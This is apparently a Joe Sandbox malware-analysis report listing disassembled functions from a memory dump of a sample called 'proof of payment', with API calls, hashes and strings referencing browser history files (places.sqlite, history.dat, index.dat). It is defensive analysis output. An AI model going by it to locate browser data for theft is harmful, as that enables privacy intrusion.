                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@DeleteObject
                                      • String ID: r!A
                                      • API String ID: 1103273653-628097481
                                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@
                                      • String ID:
                                      • API String ID: 1033339047-0
                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                      • memcmp.MSVCRT ref: 00444BA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$memcmp
                                      • String ID: $$8
                                      • API String ID: 2808797137-435121686
                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                      Download Yara Rule
                                      Strings
                                      • duplicate column name: %s, xrefs: 004307FE
                                      • too many columns on %s, xrefs: 00430763
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: duplicate column name: %s$too many columns on %s
                                      • API String ID: 0-1445880494
                                      • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                      • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                      • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                      • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                        • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                      • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                        • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                      • String ID:
                                      • API String ID: 1042154641-0
                                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                      • memset.MSVCRT ref: 00403A55
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                      • String ID: history.dat$places.sqlite
                                      • API String ID: 3093078384-467022611
                                      • Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                      • Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                      • GetLastError.KERNEL32 ref: 00417627
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ErrorLast$File$PointerRead
                                      • String ID:
                                      • API String ID: 839530781-0
                                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID: *.*$index.dat
                                      • API String ID: 1974802433-2863569691
                                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@mallocmemcpy
                                      • String ID:
                                      • API String ID: 3831604043-0
                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                      • GetLastError.KERNEL32 ref: 004175A2
                                      • GetLastError.KERNEL32 ref: 004175A8
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FilePointer
                                      • String ID:
                                      • API String ID: 1156039329-0
                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$ChangeCloseCreateFindNotificationTime
                                      • String ID:
                                      • API String ID: 1631957507-0
                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Temp$DirectoryFileNamePathWindows
                                      • String ID:
                                      • API String ID: 1125800050-0
                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00415320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • failed memory resize %u to %u bytes, xrefs: 00415358
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: failed memory resize %u to %u bytes
                                      • API String ID: 471065373-2134078882
                                      • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                      • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                                      • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                      • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: d
                                      • API String ID: 0-2564639436
                                      • Opcode ID: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                      • Opcode Fuzzy Hash: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: BINARY
                                      • API String ID: 2221118986-907554435
                                      • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                      • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                      • String ID:
                                      • API String ID: 1161345128-0
                                      • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                      • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: /stext
                                      • API String ID: 2081463915-3817206916
                                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                      • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                      • String ID:
                                      • API String ID: 159017214-0
                                      • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                      • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 3150196962-0
                                      • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                      • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: failed to allocate %u bytes of memory
                                      • API String ID: 2803490479-1168259600
                                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
